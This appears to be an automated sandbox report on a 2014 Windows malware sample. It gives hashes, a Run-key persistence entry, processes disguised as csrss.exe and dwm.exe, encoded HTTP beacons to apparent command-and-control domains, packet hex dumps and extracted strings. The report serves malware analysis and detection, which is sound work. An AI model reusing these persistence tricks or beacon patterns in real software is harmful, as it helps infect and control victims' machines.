Analysis Date2014-10-02 22:07:11
MD5b999b923e3663519f6eca571a28327c5
SHA11b559ce8e64418beab3b3d1de487708e5ef0f679

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 682a619b546aea37803fbea4f5d6718a sha1: ff820e540b18a9e2c97bab7bb472d7bec5304d52 size: 97792
Section.rdata md5: ed822bfdd3928b372c2fe49578622f3d sha1: ccc760fba651f0d5ae7793b49a3d86a6563afc36 size: 2560
Section.data md5: 27445ef9864dc03ea07cf53c24571d57 sha1: 93e85604fc5f425ee24beaf73fc0c64862f3986f size: 58880
Section.imul md5: 02634dffa6e1f12c661f140e5db341ca sha1: 28c68e2e52d3f82d960a80454ef93f4f1eebae64 size: 1024
Timestamp2005-10-16 11:00:17
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1423
PEhash714bca073c3cc8ab2137b713eb989c592877e178
IMPhash720efc1c57f73249e421366fd3dc2b28

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdoublemouseklick.com
Winsock DNS127.0.0.1
Winsock DNSbigbeerclubonline.com
Winsock DNSonlineinstitute.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSonlineinstitute.com
Type: A
67.227.195.200
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNSbigbeerclubonline.com
Type: A
DNSdoublemouseklick.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo4.jpg?v72=20&tq=gKZEtzyixSz072FJXLFEwlOoKA29eKJ2mi2Q0gH9HVXCgU%2FeSxRsZIJKsBA7WTjKBHkwU%2Fv4%2B2ghTJzEY373ZlXwDljuu3rU7QlXfbfb%2B%2B2Z8eJEQltsaDii2yGdR%2FJc7GhN%2B9%2FuuzByCapmiEOUBqRotyTRlxlqqvAaYr353fp0OG7y3aG35iMJRsxSSYoGwWrFXvvDBKXmHoov3y9do07OKpIoB5430AIYgRPVz7xRWKWnKRaO2nHA%2FwAbae%2BHe3BZeY%2F316h9i0ugWBHRMEWkZJByEOj8XC8R2MnxwPNyUsZjGJswSRRF%2F8z2oRNfHpjHT1wLMDf4U894AyvxvYgqaS%2Bvtwm3V0cFbcAMwc9WJsEmsC5dLhsaSSKl8yVOqsRR2IA9FlRWbCV30Dy7QybeOF%2Fg8fBquZp0NBZmyjC%2BzIXx99CVkVX%2B2xGnW%2FUUIBM2IQxPgg4X5F0dy3SxvSGCzgFEyb1
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f67372f 696d6167 65732f6c   GET /g7/images/l
0x00000010 (00016)   6f676f34 2e6a7067 3f763732 3d323026   ogo4.jpg?v72=20&
0x00000020 (00032)   74713d67 4b5a4574 7a796978 537a3037   tq=gKZEtzyixSz07
0x00000030 (00048)   32464a58 4c464577 6c4f6f4b 41323965   2FJXLFEwlOoKA29e
0x00000040 (00064)   4b4a326d 69325130 67483948 56584367   KJ2mi2Q0gH9HVXCg
0x00000050 (00080)   55253246 65537852 735a494a 4b734241   U%2FeSxRsZIJKsBA
0x00000060 (00096)   3757546a 4b42486b 77552532 46763425   7WTjKBHkwU%2Fv4%
0x00000070 (00112)   32423267 68544a7a 45593337 335a6c58   2B2ghTJzEY373ZlX
0x00000080 (00128)   77446c6a 75753372 5537516c 58666266   wDljuu3rU7QlXfbf
0x00000090 (00144)   62253242 25324232 5a38654a 45516c74   b%2B%2B2Z8eJEQlt
0x000000a0 (00160)   73614469 69327947 64522532 464a6337   saDii2yGdR%2FJc7
0x000000b0 (00176)   47684e25 32423925 32467575 7a427943   GhN%2B9%2FuuzByC
0x000000c0 (00192)   61706d69 454f5542 71526f74 7954526c   apmiEOUBqRotyTRl
0x000000d0 (00208)   786c7171 76416159 72333533 6670304f   xlqqvAaYr353fp0O
0x000000e0 (00224)   47377933 61473335 694d4a52 73785353   G7y3aG35iMJRsxSS
0x000000f0 (00240)   596f4777 57724658 76764442 4b586d48   YoGwWrFXvvDBKXmH
0x00000100 (00256)   6f6f7633 7939646f 30374f4b 70496f42   oov3y9do07OKpIoB
0x00000110 (00272)   35343330 41495967 5250567a 37785257   5430AIYgRPVz7xRW
0x00000120 (00288)   4b576e4b 52614f32 6e484125 32467741   KWnKRaO2nHA%2FwA
0x00000130 (00304)   62616525 32424865 33425a65 59253246   bae%2BHe3BZeY%2F
0x00000140 (00320)   33313668 39693075 67574248 524d4557   316h9i0ugWBHRMEW
0x00000150 (00336)   6b5a4a42 79454f6a 38584338 52324d6e   kZJByEOj8XC8R2Mn
0x00000160 (00352)   7877504e 7955735a 6a474a73 77535252   xwPNyUsZjGJswSRR
0x00000170 (00368)   46253246 387a326f 524e6648 706a4854   F%2F8z2oRNfHpjHT
0x00000180 (00384)   31774c4d 44663455 38393441 79767876   1wLMDf4U894Ayvxv
0x00000190 (00400)   59677161 53253242 7674776d 33563063   YgqaS%2Bvtwm3V0c
0x000001a0 (00416)   46626341 4d776339 574a7345 6d734335   FbcAMwc9WJsEmsC5
0x000001b0 (00432)   644c6873 6153534b 6c387956 4f717352   dLhsaSSKl8yVOqsR
0x000001c0 (00448)   52324941 39466c52 57624356 33304479   R2IA9FlRWbCV30Dy
0x000001d0 (00464)   37517962 654f4625 32466738 66427175   7QybeOF%2Fg8fBqu
0x000001e0 (00480)   5a70304e 425a6d79 6a432532 427a4958   Zp0NBZmyjC%2BzIX
0x000001f0 (00496)   78393943 566b5658 25324232 78476e57   x99CVkVX%2B2xGnW
0x00000200 (00512)   25324655 5549424d 32495178 50676734   %2FUUIBM2IQxPgg4
0x00000210 (00528)   58354630 64793353 78765347 437a6746   X5F0dy3SxvSGCzgF
0x00000220 (00544)   45796231 20485454 502f312e 300d0a43   Eyb1 HTTP/1.0..C
0x00000230 (00560)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000240 (00576)   0d0a486f 73743a20 6f6e6c69 6e65696e   ..Host: onlinein
0x00000250 (00592)   73746974 7574652e 636f6d0d 0a416363   stitute.com..Acc
0x00000260 (00608)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000270 (00624)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000280 (00640)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6a 38584338 52324d6e   ose....j8XC8R2Mn
0x00000160 (00352)   7877504e 7955735a 6a474a73 77535252   xwPNyUsZjGJswSRR
0x00000170 (00368)   46253246 387a326f 524e6648 706a4854   F%2F8z2oRNfHpjHT
0x00000180 (00384)   31774c4d 44663455 38393441 79767876   1wLMDf4U894Ayvxv
0x00000190 (00400)   59677161 53253242 7674776d 33563063   YgqaS%2Bvtwm3V0c
0x000001a0 (00416)   46626341 4d776339 574a7345 6d734335   FbcAMwc9WJsEmsC5
0x000001b0 (00432)   644c6873 6153534b 6c387956 4f717352   dLhsaSSKl8yVOqsR
0x000001c0 (00448)   52324941 39466c52 57624356 33304479   R2IA9FlRWbCV30Dy
0x000001d0 (00464)   37517962 654f4625 32466738 66427175   7QybeOF%2Fg8fBqu
0x000001e0 (00480)   5a70304e 425a6d79 6a432532 427a4958   Zp0NBZmyjC%2BzIX
0x000001f0 (00496)   78393943 566b5658 25324232 78476e57   x99CVkVX%2B2xGnW
0x00000200 (00512)   25324655 5549424d 32495178 50676734   %2FUUIBM2IQxPgg4
0x00000210 (00528)   58354630 64793353 78765347 437a6746   X5F0dy3SxvSGCzgF
0x00000220 (00544)   45796231 20485454 502f312e 300d0a43   Eyb1 HTTP/1.0..C
0x00000230 (00560)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000240 (00576)   0d0a486f 73743a20 6f6e6c69 6e65696e   ..Host: onlinein
0x00000250 (00592)   73746974 7574652e 636f6d0d 0a416363   stitute.com..Acc
0x00000260 (00608)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000270 (00624)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x00000280 (00640)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e755825 32425039 68253242 49307344   NuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
7.
...:.^'
NI@S..]....
..U
..U..
\
3.....s.
O.pa]
T
.Aa
..
.
ZSz..7.
x.1
<......R
..^%.
.].
....)
.cF?..
b
.
..
.
j
u
040904b0
@0$B
1.0.0.3
1423
1DG 3
2DEp
'3A1
a"s#
bq`FC
Df0r
FileVersion
G#3B
p"0d
'P3r
PrivateBuild
ProductVersion
`qf#
'rd2
$SQb
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
^/-~}#
0aU-Nf
	0t/qb
-0U0^h
1"bN"U
`|1sO:
1'-ziO
2eyKP`
3]A&6]
3@,MGt
3q=vV]
3R(XC4
3stMGE
/ =4HM
4r*-%f
\5)*w@
#6i~_-
6nd=rH
-7Y%_,-
8HHLo8
8O|`b`
8s*ooAlZ
<9^i)t
]9N[k7
AdjustWindowRect
ADVAPI32.dll
$^ag|H
a_Im#@
Am4JWBM
B&	d~J940
BitBlt
bRIFn<
$=b>`t`P<"
]C'7Bsc
CombineRgn
COMCTL32.dll
comdlg32.dll
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreateFileA
CreateFontW
CreatePatternBrush
CreatePen
CreateProcessW
CreateSolidBrush
CR^}:R
\cZbvZR
D6IJEc
D 8o6gp
@.data
DeleteDC
DeleteFileW
DeleteObject
Dks'*2`
DK?Vyq
d|m6v0
dWQ~pc
E7d.UK
 Eaw?R
>Ed00-R>
	e/:M:e@
EndDialog
EnumResourceNamesW
ExitProcess
ExtCreateRegion
F2|t5_`
F?F`2\
FindClose
FindFirstFileW
fkjU_4J
FreeLibrary
FUTq(~
GDI32.dll
GetCharWidthW
GetCurrentProcessId
GetDeviceCaps
GetDlgItem
GetLocalTime
GetMenuStringW
GetModuleHandleA
GetObjectW
GetProcAddress
GetSaveFileNameW
GetStockObject
GetSysColor
GetTextMetricsW
GetUserDefaultUILanguage
GetVDMCurrentDirectories
GetWindowInfo
GetWindowLongW
GetWindowRect
~gKo:Uw
Gx #M~P
HeapAlloc
HeapFree
\hP$_Q
hU+(aR
i%2Ez eXN
ICInfo
ImageList_Create
ImageList_Destroy
ImageList_Draw
ImageList_ReplaceIcon
iRQg"N
Ix|kl"
Jkj	KJZs
{JQ|2K
j)v*.J
K)5m>#
KERNEL32.dll
Km]S$A
k"q+/5i
k	s,8+
L5)SL+
LineTo
%lK[;#
lm*cj%
]}LMZu
LoadLibraryW
)Lo+E$
L-p[n&
LwP,h^"2
M7>9;4
MBh\O0}x
mc_`&F
MessageBoxW
"M;}hYg
m)lZtG
MoveFileW
MoveToEx
MoveWindow
m|(PB'
M\rAZ`,
MSVFW32.dll
M<UBjF
MultiByteToWideChar
m[vNh$	
N/`'2la
n[$g/e+3
nQAAcA
nuyj+s
n'Zg*U
{.oA|B
OutputDebugStringW
oVM=}+R
 p:i>f
pl;qy+o
qLk|=jK
qlOj?=N
Qs^g%p
@~=\,QV
QvEM7O
qwO&S7
R^22z_
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExW
RegDeleteKeyA
RegEnumKeyW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryValueExW
RegSetValueExW
@r:hm_{q
Rich`x
%rk`/x
`s4{6~4
S"d V]+
SelectObject
SendMessageW
SetBkColor
SetBkMode
SetFilePointer
SetRect
SetTextColor
SetThreadPriorityBoost
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowsHookExW
SetWindowTextW
SHELL32.dll
ShellExecuteW
StretchBlt
!This program cannot be run in DOS mode.
tjs	nE
tnir#z
t&RZEKp
Tw2dSD
tx9z`6A
+UG}\63<
Uhrc`;
/.uOOr
USER32.dll
}uXU9qinG9
{ .\v))
V|!}`SKA_28
W]4>-!
WideCharToMultiByte
wIwR_O
-W.;oH(
WriteFile
wZoX@4
}~X-:|
	X[e;`
.xT8,9
xV9z{mP
xySl;\
(y5Z}QQ
[y.@8<^!
#$<>#YTVMb34
Y ?,:W
%yz_JT
YZ&~|kp
Z+pbTM